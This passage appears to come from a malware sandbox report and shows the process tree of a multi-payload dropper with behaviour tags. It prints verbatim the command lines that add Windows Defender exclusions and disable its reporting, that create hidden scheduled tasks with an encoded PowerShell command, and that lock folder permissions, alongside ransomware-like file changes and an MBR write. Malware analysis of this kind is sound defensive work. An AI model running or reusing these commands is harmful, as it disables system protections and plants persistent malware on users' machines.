                                                                                "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
                                                                                9⤵
                                                                                  PID:3564
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
                                                                                    10⤵
                                                                                      PID:3636
                                                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                                                        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
                                                                                        11⤵
                                                                                          PID:3672
                                                                                        • \??\c:\windows\SysWOW64\reg.exe
                                                                                          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                                                                                          11⤵
                                                                                            PID:3788
                                                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                                                        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
                                                                                        9⤵
                                                                                          PID:3588
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                                                                                            10⤵
                                                                                              PID:3660
                                                                                              • \??\c:\windows\SysWOW64\reg.exe
                                                                                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                                                                                                11⤵
                                                                                                  PID:3760
                                                                                                • \??\c:\windows\SysWOW64\reg.exe
                                                                                                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                                                                                                  11⤵
                                                                                                    PID:3796
                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                schtasks /CREATE /TN "gfKTxbyvD" /SC once /ST 06:46:51 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                9⤵
                                                                                                • Creates scheduled task(s)
                                                                                                PID:3820
                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                schtasks /run /I /tn "gfKTxbyvD"
                                                                                                9⤵
                                                                                                  PID:4052
                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                  schtasks /DELETE /F /TN "gfKTxbyvD"
                                                                                                  9⤵
                                                                                                    PID:2200
                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                    schtasks /CREATE /TN "bvmcjEjDUxHOOxIZsK" /SC once /ST 16:42:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\prNnatYmCsQFEeCzn\OFTJvYQhcKRKyYZ\eQDfNpy.exe\" uG /site_id 394347 /S" /V1 /F
                                                                                                    9⤵
                                                                                                    • Creates scheduled task(s)
                                                                                                    PID:3404
                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 1700 -s 2524
                                                                                              6⤵
                                                                                              • Program crash
                                                                                              • Suspicious behavior: GetForegroundWindowSpam
                                                                                              PID:2284
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          C:\Windows\system32\cmd.exe /c Fri10b0a06a73706.exe
                                                                                          4⤵
                                                                                          • Loads dropped DLL
                                                                                          PID:1436
                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zSC54FE7C2\Fri10b0a06a73706.exe
                                                                                            Fri10b0a06a73706.exe
                                                                                            5⤵
                                                                                            • Executes dropped EXE
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:1588
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          C:\Windows\system32\cmd.exe /c Fri1015b9a4e0b.exe
                                                                                          4⤵
                                                                                          • Loads dropped DLL
                                                                                          PID:608
                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zSC54FE7C2\Fri1015b9a4e0b.exe
                                                                                            Fri1015b9a4e0b.exe
                                                                                            5⤵
                                                                                            • Executes dropped EXE
                                                                                            • Loads dropped DLL
                                                                                            PID:1444
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          C:\Windows\system32\cmd.exe /c Fri106e757f6d75.exe
                                                                                          4⤵
                                                                                          • Loads dropped DLL
                                                                                          PID:1260
                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zSC54FE7C2\Fri106e757f6d75.exe
                                                                                            Fri106e757f6d75.exe
                                                                                            5⤵
                                                                                            • Executes dropped EXE
                                                                                            • Loads dropped DLL
                                                                                            PID:1020
                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zSC54FE7C2\Fri106e757f6d75.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\7zSC54FE7C2\Fri106e757f6d75.exe
                                                                                              6⤵
                                                                                              • Executes dropped EXE
                                                                                              • Loads dropped DLL
                                                                                              PID:2248
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          C:\Windows\system32\cmd.exe /c Fri1008c7d6874.exe
                                                                                          4⤵
                                                                                          • Loads dropped DLL
                                                                                          PID:1080
                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zSC54FE7C2\Fri1008c7d6874.exe
                                                                                            Fri1008c7d6874.exe
                                                                                            5⤵
                                                                                            • Executes dropped EXE
                                                                                            • Loads dropped DLL
                                                                                            • Modifies system certificate store
                                                                                            PID:1368
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          C:\Windows\system32\cmd.exe /c Fri103a7805577.exe
                                                                                          4⤵
                                                                                          • Loads dropped DLL
                                                                                          PID:920
                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zSC54FE7C2\Fri103a7805577.exe
                                                                                            Fri103a7805577.exe
                                                                                            5⤵
                                                                                            • Executes dropped EXE
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:1724
                                                                                            • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                                                              6⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:3052
                                                                                              • C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
                                                                                                "C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"
                                                                                                7⤵
                                                                                                  PID:2500
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /c Fri1018ef4aa251c026c.exe
                                                                                            4⤵
                                                                                              PID:1860
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              C:\Windows\system32\cmd.exe /c Fri10d184202996a0d7f.exe
                                                                                              4⤵
                                                                                              • Loads dropped DLL
                                                                                              PID:1656
                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zSC54FE7C2\Fri10d184202996a0d7f.exe
                                                                                                Fri10d184202996a0d7f.exe
                                                                                                5⤵
                                                                                                • Executes dropped EXE
                                                                                                • Checks BIOS information in registry
                                                                                                • Loads dropped DLL
                                                                                                • Checks whether UAC is enabled
                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                PID:1040
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              C:\Windows\system32\cmd.exe /c Fri10720d229511df563.exe
                                                                                              4⤵
                                                                                              • Loads dropped DLL
                                                                                              PID:1632
                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zSC54FE7C2\Fri10720d229511df563.exe
                                                                                                Fri10720d229511df563.exe
                                                                                                5⤵
                                                                                                • Executes dropped EXE
                                                                                                • Loads dropped DLL
                                                                                                • Modifies system certificate store
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:1248
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 1248 -s 640
                                                                                                  6⤵
                                                                                                  • Loads dropped DLL
                                                                                                  • Program crash
                                                                                                  • Suspicious behavior: GetForegroundWindowSpam
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:2652
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  cmd.exe /c taskkill /f /im chrome.exe
                                                                                                  6⤵
                                                                                                    PID:2644
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                C:\Windows\system32\cmd.exe /c Fri105268dda3.exe
                                                                                                4⤵
                                                                                                  PID:1852
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSC54FE7C2\Fri105268dda3.exe
                                                                                                    Fri105268dda3.exe
                                                                                                    5⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Checks SCSI registry key(s)
                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                    PID:2424
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  C:\Windows\system32\cmd.exe /c Fri10fcc13ae0125c8.exe
                                                                                                  4⤵
                                                                                                  • Loads dropped DLL
                                                                                                  PID:1688
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSC54FE7C2\Fri10fcc13ae0125c8.exe
                                                                                                    Fri10fcc13ae0125c8.exe
                                                                                                    5⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Loads dropped DLL
                                                                                                    PID:1932
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-F4GDI.tmp\Fri10fcc13ae0125c8.tmp
                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-F4GDI.tmp\Fri10fcc13ae0125c8.tmp" /SL5="$50134,239846,156160,C:\Users\Admin\AppData\Local\Temp\7zSC54FE7C2\Fri10fcc13ae0125c8.exe"
                                                                                                      6⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Loads dropped DLL
                                                                                                      PID:1672
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-RBE1A.tmp\Sayma.exe
                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-RBE1A.tmp\Sayma.exe" /S /UID=burnerch2
                                                                                                        7⤵
                                                                                                        • Drops file in Drivers directory
                                                                                                        • Executes dropped EXE
                                                                                                        • Adds Run key to start application
                                                                                                        • Drops file in Program Files directory
                                                                                                        • Modifies system certificate store
                                                                                                        PID:2172
                                                                                                        • C:\Program Files\Internet Explorer\YINOSNAJGX\ultramediaburner.exe
                                                                                                          "C:\Program Files\Internet Explorer\YINOSNAJGX\ultramediaburner.exe" /VERYSILENT
                                                                                                          8⤵
                                                                                                          • Executes dropped EXE
                                                                                                          PID:1872
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-L5URV.tmp\ultramediaburner.tmp
                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-L5URV.tmp\ultramediaburner.tmp" /SL5="$401E6,281924,62464,C:\Program Files\Internet Explorer\YINOSNAJGX\ultramediaburner.exe" /VERYSILENT
                                                                                                            9⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Drops file in Program Files directory
                                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                                            PID:3020
                                                                                                            • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                              "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                                                                                              10⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:3140
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\76-54dca-6d7-44394-eb49ac0674ae8\Losizhyhupi.exe
                                                                                                          "C:\Users\Admin\AppData\Local\Temp\76-54dca-6d7-44394-eb49ac0674ae8\Losizhyhupi.exe"
                                                                                                          8⤵
                                                                                                          • Executes dropped EXE
                                                                                                          PID:2700
                                                                                                          • C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                            "C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
                                                                                                            9⤵
                                                                                                            • Modifies Internet Explorer settings
                                                                                                            • Suspicious behavior: GetForegroundWindowSpam
                                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                            PID:3264
                                                                                                            • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                                                                              "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3264 CREDAT:275457 /prefetch:2
                                                                                                              10⤵
                                                                                                              • Modifies Internet Explorer settings
                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                              PID:3832
                                                                                                            • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                                                                              "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3264 CREDAT:930828 /prefetch:2
                                                                                                              10⤵
                                                                                                              • Modifies Internet Explorer settings
                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                              PID:2908
                                                                                                            • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                                                                              "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3264 CREDAT:865313 /prefetch:2
                                                                                                              10⤵
                                                                                                              • Modifies Internet Explorer settings
                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                              PID:4916
                                                                                                            • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                                                                              "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3264 CREDAT:537631 /prefetch:2
                                                                                                              10⤵
                                                                                                              • Modifies Internet Explorer settings
                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                              PID:4812
                                                                                                          • C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                            "C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad
                                                                                                            9⤵
                                                                                                              PID:2100
                                                                                                            • C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                              "C:\Program Files\Internet Explorer\iexplore.exe" http://vexacion.com/afu.php?zoneid=1851483
                                                                                                              9⤵
                                                                                                                PID:2164
                                                                                                              • C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                "C:\Program Files\Internet Explorer\iexplore.exe" http://vexacion.com/afu.php?zoneid=1851513
                                                                                                                9⤵
                                                                                                                  PID:1452
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\69-1e681-c3c-218a0-085a20d2d00ec\Caledejaqy.exe
                                                                                                                "C:\Users\Admin\AppData\Local\Temp\69-1e681-c3c-218a0-085a20d2d00ec\Caledejaqy.exe"
                                                                                                                8⤵
                                                                                                                • Executes dropped EXE
                                                                                                                PID:2464
                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bl03xcip.s3a\any.exe & exit
                                                                                                                  9⤵
                                                                                                                    PID:4028
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\bl03xcip.s3a\any.exe
                                                                                                                      C:\Users\Admin\AppData\Local\Temp\bl03xcip.s3a\any.exe
                                                                                                                      10⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Modifies system certificate store
                                                                                                                      • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                                      PID:2420
                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fj2tey5u.c4l\installer.exe /qn CAMPAIGN=654 & exit
                                                                                                                    9⤵
                                                                                                                      PID:4948
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\fj2tey5u.c4l\installer.exe
                                                                                                                        C:\Users\Admin\AppData\Local\Temp\fj2tey5u.c4l\installer.exe /qn CAMPAIGN=654
                                                                                                                        10⤵
                                                                                                                        • Enumerates connected drives
                                                                                                                        • Modifies system certificate store
                                                                                                                        • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                                                        PID:5052
                                                                                                                        • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                          "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\fj2tey5u.c4l\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\fj2tey5u.c4l\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1633365286 /qn CAMPAIGN=654 " CAMPAIGN="654"
                                                                                                                          11⤵
                                                                                                                            PID:4892
                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                              C:\Windows\system32\cmd.exe /c Fri10acd1e0a9e6.exe /mixone
                                                                                                              4⤵
                                                                                                              • Loads dropped DLL
                                                                                                              PID:768
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zSC54FE7C2\Fri10acd1e0a9e6.exe
                                                                                                                Fri10acd1e0a9e6.exe /mixone
                                                                                                                5⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Loads dropped DLL
                                                                                                                PID:564
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  "C:\Windows\System32\cmd.exe" /c taskkill /im "Fri10acd1e0a9e6.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zSC54FE7C2\Fri10acd1e0a9e6.exe" & exit
                                                                                                                  6⤵
                                                                                                                    PID:2564
                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                      taskkill /im "Fri10acd1e0a9e6.exe" /f
                                                                                                                      7⤵
                                                                                                                      • Kills process with taskkill
                                                                                                                      PID:3040
                                                                                                        • C:\Windows\system32\taskeng.exe
                                                                                                          taskeng.exe {F439DF94-6A43-4146-812A-6A393C23DB1A} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]
                                                                                                          1⤵
                                                                                                            PID:3508
                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                              2⤵
                                                                                                                PID:3692
                                                                                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                2⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                PID:468
                                                                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                  3⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  PID:4136
                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                    /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
                                                                                                                    4⤵
                                                                                                                    • Creates scheduled task(s)
                                                                                                                    PID:4236
                                                                                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                2⤵
                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                PID:4644
                                                                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                  3⤵
                                                                                                                    PID:4772
                                                                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                  2⤵
                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                  PID:4012
                                                                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                    3⤵
                                                                                                                      PID:3496
                                                                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                    2⤵
                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                    PID:4632
                                                                                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                      C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                      3⤵
                                                                                                                        PID:4860
                                                                                                                    • C:\Program Files\Mozilla Firefox\default-browser-agent.exe
                                                                                                                      "C:\Program Files\Mozilla Firefox\default-browser-agent.exe" do-task
                                                                                                                      2⤵
                                                                                                                        PID:4568
                                                                                                                      • C:\Users\Admin\AppData\Roaming\fscgbhc
                                                                                                                        C:\Users\Admin\AppData\Roaming\fscgbhc
                                                                                                                        2⤵
                                                                                                                        • Checks SCSI registry key(s)
                                                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                                                        PID:4496
                                                                                                                      • C:\Users\Admin\AppData\Local\b0eea5d3-26b2-4d14-8f03-49965ac14e0b\9DC4.exe
                                                                                                                        C:\Users\Admin\AppData\Local\b0eea5d3-26b2-4d14-8f03-49965ac14e0b\9DC4.exe --Task
                                                                                                                        2⤵
                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                        PID:1984
                                                                                                                        • C:\Users\Admin\AppData\Local\b0eea5d3-26b2-4d14-8f03-49965ac14e0b\9DC4.exe
                                                                                                                          C:\Users\Admin\AppData\Local\b0eea5d3-26b2-4d14-8f03-49965ac14e0b\9DC4.exe --Task
                                                                                                                          3⤵
                                                                                                                            PID:1968
                                                                                                                      • C:\Windows\system32\conhost.exe
                                                                                                                        \??\C:\Windows\system32\conhost.exe "-85731490628417890-645160815-2033713046-1182084052-590069270-1229800579-315626950"
                                                                                                                        1⤵
                                                                                                                          PID:3368
                                                                                                                        • C:\Windows\system32\conhost.exe
                                                                                                                          \??\C:\Windows\system32\conhost.exe "788227152715672349685432795-959364922-99395053422712946920795194051203592895"
                                                                                                                          1⤵
                                                                                                                            PID:2956
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\9DC4.exe
                                                                                                                            C:\Users\Admin\AppData\Local\Temp\9DC4.exe
                                                                                                                            1⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                            PID:3356
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\9DC4.exe
                                                                                                                              C:\Users\Admin\AppData\Local\Temp\9DC4.exe
                                                                                                                              2⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Adds Run key to start application
                                                                                                                              PID:1620
                                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                icacls "C:\Users\Admin\AppData\Local\b0eea5d3-26b2-4d14-8f03-49965ac14e0b" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                                                                                                                                3⤵
                                                                                                                                • Modifies file permissions
                                                                                                                                PID:2908
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\9DC4.exe
                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\9DC4.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                                3⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                PID:3868
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\9DC4.exe
                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\9DC4.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                                  4⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • Modifies extensions of user files
                                                                                                                                  PID:2768
                                                                                                                                  • C:\Users\Admin\AppData\Local\92afbd5f-c3cf-47b0-a2cc-cc62305a2c8a\build2.exe
                                                                                                                                    "C:\Users\Admin\AppData\Local\92afbd5f-c3cf-47b0-a2cc-cc62305a2c8a\build2.exe"
                                                                                                                                    5⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                    PID:3660
                                                                                                                                    • C:\Users\Admin\AppData\Local\92afbd5f-c3cf-47b0-a2cc-cc62305a2c8a\build2.exe
                                                                                                                                      "C:\Users\Admin\AppData\Local\92afbd5f-c3cf-47b0-a2cc-cc62305a2c8a\build2.exe"
                                                                                                                                      6⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      PID:768
                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 768 -s 868
                                                                                                                                        7⤵
                                                                                                                                        • Program crash
                                                                                                                                        • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                                        PID:4388
                                                                                                                                  • C:\Users\Admin\AppData\Local\92afbd5f-c3cf-47b0-a2cc-cc62305a2c8a\build3.exe
                                                                                                                                    "C:\Users\Admin\AppData\Local\92afbd5f-c3cf-47b0-a2cc-cc62305a2c8a\build3.exe"
                                                                                                                                    5⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                    PID:1724
                                                                                                                                    • C:\Users\Admin\AppData\Local\92afbd5f-c3cf-47b0-a2cc-cc62305a2c8a\build3.exe
                                                                                                                                      "C:\Users\Admin\AppData\Local\92afbd5f-c3cf-47b0-a2cc-cc62305a2c8a\build3.exe"
                                                                                                                                      6⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      PID:3952
                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                        /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
                                                                                                                                        7⤵
                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                        PID:468
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\2A6A.exe
                                                                                                                            C:\Users\Admin\AppData\Local\Temp\2A6A.exe
                                                                                                                            1⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            PID:3964
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\72A1.exe
                                                                                                                            C:\Users\Admin\AppData\Local\Temp\72A1.exe
                                                                                                                            1⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Checks BIOS information in registry
                                                                                                                            • Checks whether UAC is enabled
                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                            PID:3432
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\2879.exe
                                                                                                                            C:\Users\Admin\AppData\Local\Temp\2879.exe
                                                                                                                            1⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Writes to the Master Boot Record (MBR)
                                                                                                                            PID:4592
                                                                                                                          • C:\Windows\system32\taskeng.exe
                                                                                                                            taskeng.exe {EDB8F8C8-4130-432E-A58F-EA2ADC2C552B} S-1-5-18:NT AUTHORITY\System:Service:
                                                                                                                            1⤵
                                                                                                                              PID:4400
                                                                                                                            • C:\Windows\system32\msiexec.exe
                                                                                                                              C:\Windows\system32\msiexec.exe /V
                                                                                                                              1⤵
                                                                                                                              • Enumerates connected drives
                                                                                                                              • Drops file in Program Files directory
                                                                                                                              • Drops file in Windows directory
                                                                                                                              • Modifies data under HKEY_USERS
                                                                                                                              • Modifies registry class
                                                                                                                              PID:4740
                                                                                                                              • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                C:\Windows\syswow64\MsiExec.exe -Embedding 81B1F38134CEB2D91799F8DCE1A41559 C
                                                                                                                                2⤵
                                                                                                                                  PID:4784
                                                                                                                                • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                  C:\Windows\syswow64\MsiExec.exe -Embedding 81A8F4DF8D03F9B689513C46864288A3
                                                                                                                                  2⤵
                                                                                                                                  • Blocklisted process makes network request
                                                                                                                                  PID:4808
                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                    "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
                                                                                                                                    3⤵
